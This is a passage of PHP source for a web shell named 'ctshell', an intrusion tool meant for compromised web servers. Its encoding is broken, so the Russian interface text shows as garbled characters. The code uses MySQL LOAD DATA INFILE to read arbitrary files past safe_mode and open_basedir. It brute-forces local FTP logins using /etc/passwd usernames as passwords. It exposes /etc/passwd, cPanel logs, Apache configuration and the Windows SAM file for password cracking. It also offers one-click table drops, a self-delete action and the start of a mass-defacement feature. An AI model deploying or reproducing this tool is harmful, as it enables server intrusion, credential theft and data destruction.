  741. if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
  742. echo "<br>";
  743. echo "Oracle: <b>";
  744. $ora_on = @function_exists('ocilogon');
  745. if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
  746. ?>
  747. <?php
  748. $free = diskfreespace($d);
  749. if (!$free) {$free = 0;}
  750. $all = disk_total_space($d);
  751. if (!$all) {$all = 0;}
  752. $used = $all-$free;
  753. $used_percent = round(100/($all/$free),2);
  754. echo "<br><b>��������� ".view_size($free)." of  ".view_size($all)." (".$used_percent."%)</b><br>";
  755. ?>
  756. </font>
  757. </div>
  758. <?
  759. if ($win)
  760. {
  761. ?>
  762.  - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="��������">�����</a></font>
  763. <?
  764. }
  765. ?>
  766. <div id="Drive" style="display: none">
  767. <?
  768. $letters = "";
  769. if ($win)
  770. {
  771.  $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
  772.  $v = explode("/",$d);
  773.  $v = $v[0];
  774.  foreach ($abc as $letter)
  775.  {
  776.   if (is_dir($letter.":/"))
  777.   {
  778. if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";}
  779. else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." </font></a> ";}
  780.   }
  781.  }
  782.  if (!empty($letters)) {echo "<b>".$letters;}
  783. }
  784. ?>
  785. </div>
  786. </td><td width=1>
  787. <font size=2><a href="<? echo $sul; ?>act=about">About</a></font>
  788. </td></tr></table>
  789. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%"  borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
  790. <tr class=tr1><td>
  791. <center>
  792. <?
  793. if (count($quicklaunch) > 0)
  794. {
  795.  foreach($quicklaunch as $item)
  796.  {
  797.   $item[1] = str_replace("%d",urlencode($d),$item[1]);
  798.   $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
  799.   echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
  800.  }
  801. }
  802. ?>
  803. </center>
  804. </td></tr></table>
  805. <?php
  806. if ((!empty($donated_html)) and (in_array($act,$donated_act)))
  807. {
  808.  ?>
  809. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br>
  810. <?php
  811. }
  812. ?>
  813. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
  814. if ($act == "") {$act = $dspact = "ls";}
  815. if ($act == "sql")
  816. {
  817.  $sql_surl = $sul."act=sql";
  818.  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  819.  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  820.  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  821.  if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  822.  if ($sql_db)  {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  823.  $sql_surl .= "&";
  824.  ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" valign="top"><center><?php
  825.  if ($sql_server)
  826.  {
  827.   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  828.   $err = mysql_error();
  829.   @mysql_select_db($sql_db,$sql_sock);
  830.   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
  831.  }
  832.  else {$sql_sock = false;}
  833.  echo "<b>�������� SQL:</b><br>";
  834.  if (!$sql_sock)
  835.  {
  836.   if (!$sql_server) {echo "��� �����";}
  837.   else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  838.  }
  839.  else
  840.  {
  841.   $sqlquicklaunch = array();
  842.   $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  843.   if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
  844.   else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
  845.   $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  846.   $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  847.   $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  848.   $sqlquicklaunch[] = array("Logout",$sul."act=sql");
  849.  
  850.   echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  851.  
  852.   if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
  853.   echo "</center>";
  854.  }
  855.  echo "</td></tr><tr>";
  856.  if (!$sql_sock) {?><td  class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center>
  857. <li>���� ����� �������� ������, ����� - �������� ��������. </li>
  858. <li>���� ������ �������� ������, ������ - localhost </li>
  859. <li>���� ���� �������� ������, ���� - 3306 (��������)</li></td>
  860. <td  class=td2 width="90%" height="1" valign="top">
  861. <TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2>
  862. <td class=td2>&nbsp;<b><font size=2 color=#000000>��������� �����:</font></b><table><tr class=tr2><td class=td2>���:</td>
  863. <td  class=td2 align=right>������:</td></tr><form><input type="hidden" name="act" value="sql"><tr>
  864. <td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td  class=td2 align=right>
  865. <input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>����:</td>
  866. <td class=td2>����:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td>
  867. <td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="�����������"></td></tr><tr>
  868. <td class=td2></td></tr></form></table></td><?php }
  869.  else
  870.  {
  871.   if (!empty($sql_db))
  872.   {
  873. ?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  874. $result = mysql_list_tables($sql_db);
  875. if (!$result) {echo mysql_error();}
  876. else
  877. {
  878.  echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  879.  $c = 0;
  880.  while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
  881. "; mysql_free_result($count); $c++;}
  882.  if (!$c) {echo "No tables found in database.";}
  883. }
  884.   }
  885.   else
  886.   {
  887. ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  888. $result = mysql_list_dbs($sql_sock);
  889. if (!$result) {echo mysql_error();}
  890. else
  891. {
  892.  ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  893.  echo "<option value=\"\">Databases (...)</option>
  894. ";
  895.  $c = 0;
  896.  while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
  897. "; $c++;}
  898. }
  899. ?></select><hr size="1" noshade>����������, �������� ���� ������<hr size="1" noshade><input type="submit" value="Go"></form><?php
  900.   }
  901.   echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  902.   if ($sql_db)
  903.   {
  904. echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
  905. if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
  906. echo "</b></center>";
  907.  
  908. $acts = array("","dump");
  909.  
  910. if ($sql_act == "query")
  911. {
  912.  echo "<hr size=\"1\" noshade>";
  913.  if ($submit)
  914.  {
  915.   if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  916.  }
  917.  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  918.  if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
  919. }
  920. if (in_array($sql_act,$acts))
  921. {
  922.  ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  923.  if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  924.  if ($sql_act == "newtpl")
  925.  {
  926.   echo "<b>";
  927.   if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  928.  }
  929.  else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
  930. }
  931. elseif ($sql_act == "dump")
  932. {
  933.  $set = array();
  934.  $set["sock"] = $sql_sock;
  935.  $set["db"] = $sql_db;
  936.  $dump_out = "print";
  937.  if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
  938.  elseif ($dump_out == "download")
  939.  {
  940.   @ob_clean();
  941.   header("Content-type: ctshell");
  942.   header("Content-disposition: attachment; filename=\"".$f."\";");
  943.   $set["print"] = 1;
  944.   $set["nl2br"] = 1;
  945.  }
  946.  $set["file"] = $dump_file;
  947.  $set["add_drop"] = true;
  948.  $ret = mysql_dump($set);
  949.  if ($dump_out == "download") {exit;}
  950. }
  951. else
  952. {
  953.  $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error());
  954.  echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
  955.  echo "<tr>";
  956.  echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
  957.  echo "<td><center><b>Table</b></center></td>";
  958.  echo "<td><b>Rows</b></td>";
  959.  echo "<td><b>Type</b></td>";
  960.  echo "<td><b>Created</b></td>";
  961.  echo "<td><b>Modified</b></td>";
  962.  echo "<td><b>Size</b></td>";
  963.  echo "<td><b>Action</b></td>";
  964.  echo "</tr>";
  965.  $i = 0;
  966.  $tsize = $trows = 0;
  967.  while ($row = mysql_fetch_array($result, MYSQL_NUM))
  968.  {
  969.   $tsize += $row["5"];
  970.   $trows += $row["5"];
  971.   $size = view_size($row["5"]);
  972.   echo "<tr>";
  973.   echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
  974.   echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
  975.   echo "<td>".$row[3]."</td>";
  976.   echo "<td>".$row[1]."</td>";
  977.   echo "<td>".$row[10]."</td>";
  978.   echo "<td>".$row[11]."</td>";
  979.   echo "<td>".$size."</td>";
  980.   echo "<td>
  981. &nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
  982. &nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
  983. <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
  984. </td>";
  985.   echo "</tr>";
  986.   $i++;
  987.  }
  988.  echo "<tr bgcolor=\"000000\">";
  989.  echo "<td><center><b>�</b></center></td>";
  990.  echo "<td><center><b>".$i." table(s)</b></center></td>";
  991.  echo "<td><b>".$trows."</b></td>";
  992.  echo "<td>".$row[1]."</td>";
  993.  echo "<td>".$row[10]."</td>";
  994.  echo "<td>".$row[11]."</td>";
  995.  echo "<td><b>".view_size($tsize)."</b></td>";
  996.  echo "<td></td>";
  997.  echo "</tr>";
  998.  echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
  999. <option>With selected:</option>
  1000. <option value=\"drop\" >Drop</option>
  1001. <option value=\"empty\" >Empty</option>
  1002. <option value=\"chk\">Check table</option>
  1003. <option value=\"Optimize table\">Optimize table</option>
  1004. <option value=\"Repair table\">Repair table</option>
  1005. <option value=\"Analyze table\">Analyze table</option>
  1006. </select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
  1007.  mysql_free_result($result);
  1008. }
  1009.   }
  1010.   }
  1011.   else
  1012.   {
  1013. $acts = array("","newdb","serverstat","servervars","processes","getfile");
  1014. if (in_array($sql_act,$acts))
  1015. {
  1016.  ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>�������� ����� ����:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="�������"></form></td><td width="30%" height="1"><b>����������� �����:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="�����"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  1017. }
  1018. if (!empty($sql_act))
  1019. {
  1020.  echo "<hr size=\"1\" noshade>";
  1021.  if ($sql_act == "newdb")
  1022.  {
  1023.   echo "<b>";
  1024.   if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1025.   else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
  1026.  }
  1027.  if ($sql_act == "serverstatus")
  1028.  {
  1029.   $result = mysql_query("SHOW STATUS", $sql_sock);
  1030.   echo "<center><b>Server-status variables:</b><br><br>";
  1031.   echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
  1032.   while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1033.   echo "</table></center>";
  1034.   mysql_free_result($result);
  1035.  }
  1036.  if ($sql_act == "servervars")
  1037.  {
  1038.   $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1039.   echo "<center><b>Server variables:</b><br><br>";
  1040.   echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
  1041.   while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1042.   echo "</table>";
  1043.   mysql_free_result($result);
  1044.  }
  1045.  if ($sql_act == "processes")
  1046.  {
  1047.   if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  1048.   $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1049.   echo "<center><b>��������:</b><br><br>";
  1050.   echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1051.   while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1052.   echo "</table>";
  1053.   mysql_free_result($result);
  1054.  }
  1055.  elseif (($sql_act == "getfile"))
  1056.  {
  1057.   if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
  1058.   elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
  1059.   elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
  1060.   else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
  1061.   else
  1062.   {
  1063. for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1064. $f = "";
  1065. while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
  1066. if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
  1067. else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
  1068.   }
  1069.   mysql_free_result($result);
  1070.   if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
  1071.   }
  1072.  }
  1073. }
  1074.   }
  1075.  }
  1076.  echo "</tr></table></table>";
  1077. }
  1078. if ($act == "mkdir")
  1079. {
  1080.  if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
  1081.  echo "<br><br>";
  1082.  $act = $dspact = "ls";
  1083. }
  1084. if ($act == "ftpquickbrute")
  1085. {
  1086.  echo "<b>Ftp Quick brute:</b><br>";
  1087.  if ($win) {echo "This functions not work in Windows!<br><br>";}
  1088.  else
  1089.  {
  1090.   function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  1091.   {
  1092. if ($fqb_onlywithsh)
  1093. {
  1094.  if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
  1095.  else {$true = true;}
  1096. }
  1097. else {$true = true;}
  1098. if ($true)
  1099. {
  1100.  $sock = @ftp_connect($host,$port,$timeout);
  1101.  if (@ftp_login($sock,$login,$pass))
  1102.  {
  1103.   echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  1104.   ob_flush();
  1105.   return true;
  1106.  }
  1107. }
  1108.   }
  1109.   if (!empty($submit))
  1110.   {
  1111. if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1112. $fp = fopen("/etc/passwd","r");
  1113. if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1114. else
  1115. {
  1116.  ob_flush();
  1117.  $i = $success = 0;
  1118.  $ftpquick_st = getmicrotime();
  1119.  while(!feof($fp))
  1120.  {
  1121.   $str = explode(":",fgets($fp,2048));
  1122.   if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
  1123.   {
  1124. $success++;
  1125.   }
  1126.   if ($i > $fqb_lenght) {break;}
  1127.   $i++;
  1128.  }
  1129.  if ($success == 0) {echo "No success. connections!";}
  1130.  $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1131.  echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
  1132. }
  1133.   }
  1134.   else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
  1135.  }
  1136. }
  1137. if ($act == "lsa")
  1138. {
  1139.  echo "<center><b>���������� ������������ �������:</b></center>";
  1140.  echo "<b>����������� �����������:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
  1141.  echo "<b>������������: ".$hsafemode."</b><br>";
  1142.  echo "<b>�������� �������� ��������: ".$hopenbasedir."</b><br>";
  1143.  if (!$win)
  1144.  {
  1145.   if ($nixpasswd)
  1146.   {
  1147. if ($nixpasswd == 1) {$nixpasswd = 0;}
  1148. $num = $nixpasswd + $nixpwdperpage;
  1149. echo "<b>*nix /etc/passwd:</b><br>";
  1150. $i = $nixpasswd;
  1151. while ($i < $num)
  1152. {
  1153.  $uid = posix_getpwuid($i);
  1154.  if ($uid) {echo join(":",$uid)."<br>";}
  1155.  $i++;
  1156. }
  1157.   }
  1158.   else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
  1159.   if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  1160.   if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
  1161.   if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1162.   if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1163.  }
  1164.  else
  1165.  {
  1166.   $v = $_SERVER["WINDIR"]."\repair\sam";
  1167.   if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
  1168.   else {echo "<b><font color=\"green\">�� ������ �������� winnt ������. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>�������</b></u></a>, c ������������� lcp.crack+.</font></b><br>";}
  1169.  }
  1170. }
  1171. if ($act == "mkfile")
  1172. {
  1173.  if ($mkfile != $d)
  1174.  {
  1175.   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  1176.   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  1177.   else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
  1178.  }
  1179.  else {$act = $dspact = "ls";}
  1180. }
  1181. if ($act == "fsbuff")
  1182. {
  1183.  $arr_copy = $sess_data["copy"];
  1184.  $arr_cut = $sess_data["cut"];
  1185.  $arr = array_merge($arr_copy,$arr_cut);
  1186.  if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  1187.  else
  1188.  {
  1189.   echo "<b>File-System buffer</b><br><br>";
  1190.   $ls_arr = $arr;
  1191.   $disp_fullpath = true;
  1192.   $act = "ls";
  1193.  }
  1194. }
  1195. if ($act == "selfremove")
  1196. {
  1197.  if (!empty($submit))
  1198.  {
  1199.   if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; }
  1200.   else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  1201.  }
  1202.  else
  1203.  {
  1204.   $v = array();
  1205.   for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";}
  1206.   $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>";
  1207.   shuffle($v);
  1208.   $v = join("&nbsp;&nbsp;&nbsp;",$v);
  1209.   echo "<b>�����������: ".__FILE__." <br>�� ��������?</b><center>".$v."</center>";
  1210.  }
  1211. }
  1212. if ($act == "massdeface")
  1213. {
